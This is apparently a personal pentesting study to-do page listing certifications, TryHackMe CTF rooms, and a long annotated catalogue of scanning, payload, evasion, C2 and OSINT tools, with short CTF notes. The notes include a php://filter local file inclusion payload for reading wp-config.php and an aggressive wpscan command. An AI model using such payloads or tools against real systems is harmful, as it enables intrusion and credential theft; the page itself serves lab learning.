πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet. See also the Blogs section.

Pentesting certification

  • OSCP
  • GPEN
  • GXPN

GitHub Topics

Roadmap


Reading articles


Resources

Mobile

Joker

Active directory 🧸

  • None

CMS

  • None

Defense

  • None

CTFs Practice

Networking

Windows

Linux

  • ...

OSINT

Cloud

  • Attacking and Defending AWS

Tools

Big THM CTF List
https://tryhackme.com/room/surfer
https://tryhackme.com/room/lazyadmin (notes below)
https://tryhackme.com/room/ninjaskills
https://tryhackme.com/room/gamezone
https://tryhackme.com/room/skynet
https://tryhackme.com/room/alfred
https://tryhackme.com/room/brooklynninenine
https://tryhackme.com/room/breakoutthecage1
https://tryhackme.com/room/blog
https://tryhackme.com/room/jason
https://tryhackme.com/room/source
https://tryhackme.com/room/committed
https://tryhackme.com/room/toolsrus
https://tryhackme.com/room/kiba
https://tryhackme.com/room/bruteit
https://tryhackme.com/room/dejavu
https://tryhackme.com/room/tonythetiger (java)
--- Medium
https://tryhackme.com/room/ultratech1 (web - guided?)
https://tryhackme.com/room/hackpark (windows, guided)
https://tryhackme.com/room/anonymous (nmap, smb?, ...)
https://tryhackme.com/room/overpass2hacked
https://tryhackme.com/room/overpass3hosting (web/...) 
--- Hard
https://tryhackme.com/room/mrrobot
https://tryhackme.com/room/dailybugle
https://tryhackme.com/room/retro (blaster...)

Long list of tools

Legend

  • πŸ”Ž = Investigation
  • 🏝️ = Discovery
  • πŸ’₯ = Exploitation
  • πŸ”‘ = Privilege escalation
  • ✈️ = Post-exploitation
  • πŸ›‘οΈ = Defense
  • πŸƒοΈ = Special

Tools

  • legion (🏝️πŸ’₯✈️) (automated penetration framework)
  • beyondsecurity (πŸ”ŽπŸπŸ’₯) (vulnerability scanner)
  • KitHack (πŸ”ŽπŸπŸ’₯✈️) (penetration testing framework)
  • hoaxshell (πŸ”ŽπŸπŸ’₯) (subdomain, IP scan, CMS identification)
  • Villain (πŸ”ŽβœˆοΈ) (post-exploitation framework)
  • OWASP Amass (🏝) (subdomain, DNS, and port scanning)
  • HackTools (πŸ”ŽπŸπŸ’₯) (bunch of tools)
  • TheFatRat (πŸ’₯✈️) (backdoors and payloads)
  • Phantom-Evasion (πŸ’₯✈️) (generate and obfuscate Windows payload)
  • msfpc (πŸ’₯✈️) (generating Metasploit payloads)
  • arsenal (✈️) (data exfiltration)
  • hackertarget (🏝) (port scanning, traceroute, and reverse IP)
  • Raccoon (🏝) (subdomain, OSINT)
  • Photon (🏝) (web enumeration, subdomains)
  • Hping3 (πŸ’₯) (firewall bypass, port/os scanning, -S -p SA/RA --flood)
  • QualysGuard (πŸ”ŽπŸ”‘βœˆοΈ) (cloud-based vulnerability scanner)
  • Acunetix (πŸ”ŽπŸ’₯) (web vulnerability scanner)
  • Nexpose (πŸ”ŽπŸ”‘βœˆοΈ) (network vulnerability scanner)
  • Retina (πŸ”ŽπŸ”‘βœˆοΈ) (vulnerability scanner)
  • Nipper (πŸ”Ž) (network devices scanner)
  • Nettacker (🏝πŸ’₯) (port scanning, vulnerability scanning)
  • Empire (✈️) (post-exploitation framework) N/O
  • DSSS (🏝πŸ’₯) (SQL vulnerability scanner)
  • Beef (πŸ’₯βœˆοΈπŸ›‘οΈ) (7.8k ⭐, client-side vulnerability scanner)
  • host (πŸ”ŽπŸ) (DNS lookup)
  • dnswalk (πŸ”ŽπŸ) (DNS investigation)
  • dnsmap (πŸ”ŽπŸ) (vhost brute force)
  • Netsparker (🏝πŸ’₯✈️) (web vulnerability scanner)
  • Skipfish (🏝) (11.4k ⭐, web vulnerability scanner)
  • W3af (🏝πŸ’₯πŸ”‘) (web vulnerability scanner)
  • Arachni (🏝πŸ’₯) (web vulnerability scanner)
  • AppScan (🏝πŸ’₯) (web vulnerability scanner)
  • IronWASP (🏝πŸ’₯) (web vulnerability scanner)
  • Grabber (🏝πŸ’₯) (web vulnerability scanner)
  • proxify (✈️) (HTTP proxy)
  • interactsh (✈️) (rogue server)
  • naabu (🏝) (network scanner)
  • nuclei (🏝πŸ’₯) (web application scanner)
  • dnsx (🏝) (dns enumeration)
  • bettercap (πŸ’₯) (sniffing, MITM)
  • evilgrade (πŸ’₯✈️) (exploiting update systems, MITM)
  • CodeSec (🏝πŸ’₯) (web vulnerability scanner)
  • venom (πŸ”ŽπŸπŸ’₯πŸ”‘βœˆοΈ) (payloads? -h/-c/-u/-p/-s, scan/crawl/portscan)
  • Burp Collaborator client (πŸƒ) (server for SSRF/XXE/...)
  • recon-ng (πŸ”Ž) (reconnaissance framework)
  • Archive.is (πŸ”Ž) (web archive)
  • CommonCrawl (πŸ”Ž) (web crawler)
  • Netcraft (πŸ”Ž) (web investigation)
  • PassiveTotal (πŸ”Ž) (IP/domains/email analysis)
  • intelius/zabasearch (πŸ”Ž) (people search engines)
  • peoplefinder (πŸ”Ž) (people search engines)
  • Pipl (πŸ”Ž) (people search engines)
  • awesome-osint (πŸ”Ž) (12.1k ⭐, list of tools)
  • OSINT-Tools (πŸ”Ž) (list of tools)
  • Social Mapper (πŸ”ŽπŸ) (socmint)
  • StalkScan (πŸ”Ž) (facebook recon)
  • SpiderFoot (πŸ”ŽπŸβœˆοΈ) (9.4k ⭐, Automated OSINT)
  • FMiner (πŸ”ŽπŸ) (Web scrapping)
  • Octoparse (πŸ”ŽπŸ) (Web scrapping)
  • ParseHub (πŸ”ŽπŸ) (Web scrapping)
  • Tor Browser (πŸ”ŽβœˆοΈ) (web browser)
  • DarkSearch (🏝) (darknet search engine)
  • Ahmia (🏝) (tor search engine)
  • OnionScan (πŸ”Ž) (scan the Tor network)
  • Censys (πŸ”ŽπŸ) (Device/Network search engine)
  • Zoomeye (πŸ”ŽπŸ) (Chinese device/network search engine)
  • BinaryEdge (πŸ”ŽπŸ) (Device search engine)
  • Fofa (πŸ”ŽπŸ) (Device/Network search engine)
  • Shikata ga nai (πŸ’₯) (payloads)
  • unicorn (πŸ’₯) (payload, shellcode injection)
  • cobalt strike (πŸ’₯✈️) (penetration testing tool)
  • searchlight (πŸ”Ž) (OSINT)
  • WebScarab (πŸ”ŽπŸ) (intercept HTTP requests)
  • Vega (πŸ”ŽπŸ) (web application scanner)
  • Aircrack-ng (πŸ’₯πŸ”‘) (analyze traffic, crack WEP/WPA/... passwords)
  • Kismet (🏝) (wireless network detection and analysis)
  • MBSA (🏝) (scan Windows-based computers for vulnerabilities)
  • Cain and Abel (πŸ’₯πŸ”‘βœˆοΈ) (password recovery, sniffing, MITM, spoofing)
  • Ettercap (πŸ’₯πŸ”‘βœˆοΈ) (sniffing, MITM, spoofing)
  • Greenbone (🏝) (vulnerability management)
  • AppDetectivePro (πŸπŸ›‘οΈ) (Database vulnerability scanners)
  • Dbprotect (πŸπŸ›‘οΈ) (Database vulnerability scanners)
  • sputnik (πŸ”Ž) (OSINT scanner)
  • netdiscover (🏝) (network discovery, -r IP|IP/CIDR)
  • Mxtoolbox (πŸ”Ž) (email configuration)
  • hp webinspect (🏝πŸ’₯) (web application scanner)
  • Linsniff (✨) (packet capture and analysis)
  • Websniff (✨) (packet capture and analysis)
  • Snoop (✨) (packet capture and analysis)
  • sslyzer (🏝) (SSL scanner and analyzer)
  • webslayer (🏝) (web application scanner)
  • Tamper Chrome|tamper.dev (🏝πŸ’₯) (intercept HTTP request)
  • httpx (🏝πŸ’₯) (web server enumeration)
  • Core Impact (πŸ’₯πŸ”‘βœˆοΈ) (paid exploitation framework)
  • chaos (πŸ”Ž) (DNS recon)
  • Veil Framework (πŸ’₯) (payloads)
  • Phantom-Evasion (✈️) (antivirus evasion tool)
  • FavFreak (🏝) (favicon recon)
  • waybackurls (πŸ”Ž) (wayback tool)
  • EyeWitness
  • ptunnel
  • sshuttle
  • red-team-scripts
  • NetworkMiner
  • NetWitness
  • EXOCET
  • HackBrowserData
  • AutoRecon
  • Kismet
  • ssf
  • pupy
  • nishang
  • Mythic (c2 framework)
  • darkarmour (antivirus evasion tool)
  • vbe-decoder
  • Bluto

CTFs not done

https://tryhackme.com/room/lazyadmin 🐍🐍⭐

  • nmap
  • Gobuster
  • FTP do not seem to work with path (to upload with put, but it works if you start FTP in the directory where the file is)

https://tryhackme.com/room/allinonemj 🐍🐍⭐

  • Test: wpscan --url http://IP/wordpress/ --detection-mode aggressive
  • php://filter/convert.base64-encode/resource=../../../../../wp-config.php (file inclusion, https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/)

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

https://redteam.guide/ (book)
https://www.hackers-arise.com (book)
Hack Like a LEGEND (book)
https://ippsec.rocks/?#

OSINT

Tools